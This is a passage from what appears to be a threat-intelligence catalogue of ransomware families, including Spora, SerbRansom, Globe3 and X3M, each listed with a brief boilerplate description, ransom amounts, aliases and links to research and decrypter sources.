<div class="sect2">
<h3 id="_spora_ransomware"><a class="anchor" href="#_spora_ransomware"></a><a class="link" href="#_spora_ransomware">Spora Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Sample of a spam email with a viral attachment: <a href="https://4.bp.blogspot.com/-KkJXiHG80S0/WHX4TBpkamI/AAAAAAAADDg/F_bN796ndMYnzfUsgSWMXhRxFf3Ic-HtACLcB/s1600/spam-email.png" class="bare">https://4.bp.blogspot.com/-KkJXiHG80S0/WHX4TBpkamI/AAAAAAAADDg/F_bN796ndMYnzfUsgSWMXhRxFf3Ic-HtACLcB/s1600/spam-email.png</a></p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1750. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/spora-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/spora-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.gdatasoftware.com/2017/01/29442-spora-worm-and-ransomware">https://blog.gdatasoftware.com/2017/01/29442-spora-worm-and-ransomware</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.emsisoft.com/2017/01/10/from-darknet-with-love-meet-spora-ransomware/">http://blog.emsisoft.com/2017/01/10/from-darknet-with-love-meet-spora-ransomware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptokill_ransomware"><a class="anchor" href="#_cryptokill_ransomware"></a><a class="link" href="#_cryptokill_ransomware">CryptoKill Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The files get encrypted, but the decrypt key is not available. NO POINT OF PAYING THE RANSOM, THE FILES WILL NOT BE RETURNED.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1751. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/cryptokill-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/cryptokill-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_all_your_documents_ransomware"><a class="anchor" href="#_all_your_documents_ransomware"></a><a class="link" href="#_all_your_documents_ransomware">All_Your_Documents Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1752. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/allyourdocuments-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/allyourdocuments-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_serbransom_2017_ransomware"><a class="anchor" href="#_serbransom_2017_ransomware"></a><a class="link" href="#_serbransom_2017_ransomware">SerbRansom 2017 Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The ransom is 500$ in bitcoins. The name of the hacker is R4z0rx0r Serbian Hacker.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1753. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/serbransom-2017.html">https://id-ransomware.blogspot.co.il/2017/02/serbransom-2017.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/ultranationalist-developer-behind-serbransom-ransomware/">https://www.bleepingcomputer.com/news/security/ultranationalist-developer-behind-serbransom-ransomware/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-february-10th-2017-serpent-spora-id-ransomware/">https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-february-10th-2017-serpent-spora-id-ransomware/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/830116190873849856">https://twitter.com/malwrhunterteam/status/830116190873849856</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fadesoft_ransomware"><a class="anchor" href="#_fadesoft_ransomware"></a><a class="link" href="#_fadesoft_ransomware">Fadesoft Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The ransom is 0.33 bitcoins.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1754. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/fadesoft-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/fadesoft-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/829768819031805953">https://twitter.com/malwrhunterteam/status/829768819031805953</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/838700700586684416">https://twitter.com/malwrhunterteam/status/838700700586684416</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hugeme_ransomware"><a class="anchor" href="#_hugeme_ransomware"></a><a class="link" href="#_hugeme_ransomware">HugeMe Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1755. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/hugeme-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/hugeme-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.ozbargain.com.au/node/228888?page=3">https://www.ozbargain.com.au/node/228888?page=3</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/04/magic-ransomware.html">https://id-ransomware.blogspot.co.il/2016/04/magic-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dyna_crypt_ransomware"><a class="anchor" href="#_dyna_crypt_ransomware"></a><a class="link" href="#_dyna_crypt_ransomware">DynA-Crypt Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<div class="paragraph">
<p>DynA-Crypt Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>DynA CryptoLocker Ransomware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1756. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/dyna-crypt-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/dyna-crypt-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/dyna-crypt-not-only-encrypts-your-files-but-also-steals-your-info/">https://www.bleepingcomputer.com/news/security/dyna-crypt-not-only-encrypts-your-files-but-also-steals-your-info/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_serpent_2017_ransomware"><a class="anchor" href="#_serpent_2017_ransomware"></a><a class="link" href="#_serpent_2017_ransomware">Serpent 2017 Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<div class="paragraph">
<p>Serpent 2017 Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Serpent Danish Ransomware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1757. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/serpent-danish-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/serpent-danish-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_erebus_2017_ransomware"><a class="anchor" href="#_erebus_2017_ransomware"></a><a class="link" href="#_erebus_2017_ransomware">Erebus 2017 Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1758. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/erebus-2017-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/erebus-2017-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/erebus-ransomware-utilizes-a-uac-bypass-and-request-a-90-ransom-payment/">https://www.bleepingcomputer.com/news/security/erebus-ransomware-utilizes-a-uac-bypass-and-request-a-90-ransom-payment/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cyber_drill_exercise"><a class="anchor" href="#_cyber_drill_exercise"></a><a class="link" href="#_cyber_drill_exercise">Cyber Drill Exercise</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<div class="paragraph">
<p>Cyber Drill Exercise is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Ransomuhahawhere</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1759. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/ransomuhahawhere.html">https://id-ransomware.blogspot.co.il/2017/02/ransomuhahawhere.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cancer_ransomware_fake"><a class="anchor" href="#_cancer_ransomware_fake"></a><a class="link" href="#_cancer_ransomware_fake">Cancer Ransomware FAKE</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. This is a trollware that does not encrypt your files but makes your computer act crazy (like in the video in the link below). It is meant to be annoying and it is hard to erase from your PC, but possible.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1760. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/cancer-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/cancer-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/watch-your-computer-go-bonkers-with-cancer-trollware/">https://www.bleepingcomputer.com/news/security/watch-your-computer-go-bonkers-with-cancer-trollware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_updatehost_ransomware"><a class="anchor" href="#_updatehost_ransomware"></a><a class="link" href="#_updatehost_ransomware">UpdateHost Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Poses as Microsoft Copyright 2017 and requests ransom in bitcoins.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1761. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/updatehost-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/updatehost-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/startups/Windows_Update_Host-16362.html">https://www.bleepingcomputer.com/startups/Windows_Update_Host-16362.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nemesis_ransomware"><a class="anchor" href="#_nemesis_ransomware"></a><a class="link" href="#_nemesis_ransomware">Nemesis Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 10 bitcoins.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1762. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/nemesis-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/nemesis-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_evil_ransomware"><a class="anchor" href="#_evil_ransomware"></a><a class="link" href="#_evil_ransomware">Evil Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Domain KZ is used, therefore it is assumed that the decrypter is from Kazakhstan. Coded in Javascript</p>
</div>
<div class="paragraph">
<p>Evil Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>File0Locked KZ Ransomware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1763. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/evil-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/evil-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.enigmasoftware.com/evilransomware-removal/">http://www.enigmasoftware.com/evilransomware-removal/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://usproins.com/evil-ransomware-is-lurking/">http://usproins.com/evil-ransomware-is-lurking/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/jiriatvirlab/status/818443491713884161">https://twitter.com/jiriatvirlab/status/818443491713884161</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/PolarToffee/status/826508611878793219">https://twitter.com/PolarToffee/status/826508611878793219</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ocelot_ransomware_fake_ransomware"><a class="anchor" href="#_ocelot_ransomware_fake_ransomware"></a><a class="link" href="#_ocelot_ransomware_fake_ransomware">Ocelot Ransomware (FAKE RANSOMWARE)</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. This is a fake ransomware. Your files are not really encrypted, however the attacker does ask for a ransom of .03 bitcoins. It is still dangerous even though it is fake, he still go through to your computer.</p>
</div>
<div class="paragraph">
<p>Ocelot Ransomware (FAKE RANSOMWARE) is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Ocelot Locker Ransomware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1764. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/ocelot-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/ocelot-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/817648547231371264">https://twitter.com/malwrhunterteam/status/817648547231371264</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_skyname_ransomware"><a class="anchor" href="#_skyname_ransomware"></a><a class="link" href="#_skyname_ransomware">SkyName Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to Czechoslovakianspeaking users. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Based on HiddenTear</p>
</div>
<div class="paragraph">
<p>SkyName Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Blablabla Ransomware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1765. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/skyname-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/skyname-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/817079028725190656">https://twitter.com/malwrhunterteam/status/817079028725190656</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mafiaware_ransomware"><a class="anchor" href="#_mafiaware_ransomware"></a><a class="link" href="#_mafiaware_ransomware">MafiaWare Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 155$ inbitcoins. Creator of ransomware is called Mafia. Based on HiddenTear</p>
</div>
<div class="paragraph">
<p>MafiaWare Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Depsex Ransomware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1766. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/mafiaware.html">https://id-ransomware.blogspot.co.il/2017/01/mafiaware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-january-6th-2017-fsociety-mongodb-pseudo-darkleech-and-more/">https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-january-6th-2017-fsociety-mongodb-pseudo-darkleech-and-more/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/BleepinComputer/status/817069320937345024">https://twitter.com/BleepinComputer/status/817069320937345024</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_globe3_ransomware"><a class="anchor" href="#_globe3_ransomware"></a><a class="link" href="#_globe3_ransomware">Globe3 Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 3 bitcoins. Extesion depends on the config file. It seems Globe is a ransomware kit.</p>
</div>
<div class="paragraph">
<p>Globe3 Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Purge Ransomware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1767. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/globe3-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/globe3-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/forums/t/624518/globe-ransomware-help-and-support-purge-extension-how-to-restore-fileshta/">https://www.bleepingcomputer.com/forums/t/624518/globe-ransomware-help-and-support-purge-extension-how-to-restore-fileshta/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/the-globe-ransomware-wants-to-purge-your-files/">https://www.bleepingcomputer.com/news/security/the-globe-ransomware-wants-to-purge-your-files/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://decryptors.blogspot.co.il/2017/01/globe3-decrypter.html">https://decryptors.blogspot.co.il/2017/01/globe3-decrypter.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://decrypter.emsisoft.com/globe3">https://decrypter.emsisoft.com/globe3</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bleedgreen_ransomware"><a class="anchor" href="#_bleedgreen_ransomware"></a><a class="link" href="#_bleedgreen_ransomware">BleedGreen Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 500$ in bitcoins. Requires .NET Framework 4.0. Gets into your startup system and sends you notes like the one below: <a href="https://4.bp.blogspot.com/-xrr6aoB_giw/WG1UrGpmZJI/AAAAAAAAC-Q/KtKdQP6iLY4LHaHgudF5dKs6i1JHQOBmgCLcB/s1600/green1.jpg" class="bare">https://4.bp.blogspot.com/-xrr6aoB_giw/WG1UrGpmZJI/AAAAAAAAC-Q/KtKdQP6iLY4LHaHgudF5dKs6i1JHQOBmgCLcB/s1600/green1.jpg</a></p>
</div>
<div class="paragraph">
<p>BleedGreen Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>FireCrypt Ransomware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1768. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/bleedgreen-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/bleedgreen-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/firecrypt-ransomware-comes-with-a-ddos-component/">https://www.bleepingcomputer.com/news/security/firecrypt-ransomware-comes-with-a-ddos-component/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_btcamant_ransomware"><a class="anchor" href="#_btcamant_ransomware"></a><a class="link" href="#_btcamant_ransomware">BTCamant Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Original name is Mission 1996 or Mission: “Impossible” (1996) (like the movie)</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1769. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/btcamant.html">https://id-ransomware.blogspot.co.il/2017/01/btcamant.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_x3m_ransomware"><a class="anchor" href="#_x3m_ransomware"></a><a class="link" href="#_x3m_ransomware">X3M Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. It is also possible to break in using RDP Windows with the help of Pass-the-Hash system, PuTTY, mRemoteNG, TightVNC, Chrome Remote Desktop, modified version of TeamViewer, AnyDesk, AmmyyAdmin, LiteManager, Radmin and others. Ransom is 700$ in Bitcoins.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1770. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/x3m-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/x3m-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gog_ransomware"><a class="anchor" href="#_gog_ransomware"></a><a class="link" href="#_gog_ransomware">GOG Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1771. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/gog-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/gog-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/BleepinComputer/status/816112218815266816">https://twitter.com/BleepinComputer/status/816112218815266816</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_edgelocker"><a class="anchor" href="#_edgelocker"></a><a class="link" href="#_edgelocker">EdgeLocker</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 0.1 Bitcoins. Original name is TrojanRansom.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1772. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
